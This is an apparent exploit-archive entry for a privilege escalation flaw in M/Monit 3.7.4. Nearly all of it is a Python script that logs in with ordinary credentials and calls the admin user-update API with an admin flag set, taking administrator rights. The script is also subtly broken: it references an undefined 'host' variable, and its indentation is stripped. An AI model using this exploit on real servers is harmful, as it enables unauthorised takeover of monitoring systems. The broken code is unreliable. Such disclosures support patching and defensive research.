M/Monit version 3.7.4 suffers from a privilege escalation vulnerability.
113ca819223ec2509a10cb30146bc254
# Title: M/Monit 3.7.4 - Privilege Escalation
# Author: Dolev Farhi
# Date: 2020-07-09
# Vendor Homepage: https://mmonit.com/
# Version : 3.7.4
import sys
import requests
url = 'http://your_ip_here:8080'
username = 'test'
password = 'test123'
sess = requests.Session()
sess.get(host)
def login():
print('Attempting to login...')
data = {
'z_username':username,
'z_password':password
}
headers = {
'Content-Type':'application/x-www-form-urlencoded'
}
resp = sess.post(url + '/z_security_check', data=data, headers=headers)
if resp.ok:
print('Logged in successfully.')
else:
print('Could not login.')
sys.exit(1)
def privesc():
data = {
'uname':username,
'fullname':username,
'password':password,
'admin':1
}
resp = sess.post(url + '/api/1/admin/users/update', data=data)
if resp.ok:
print('Escalated to administrator.')
else:
print('Unable to escalate to administrator.')
return
if __name__ == '__main__':
login()
privesc()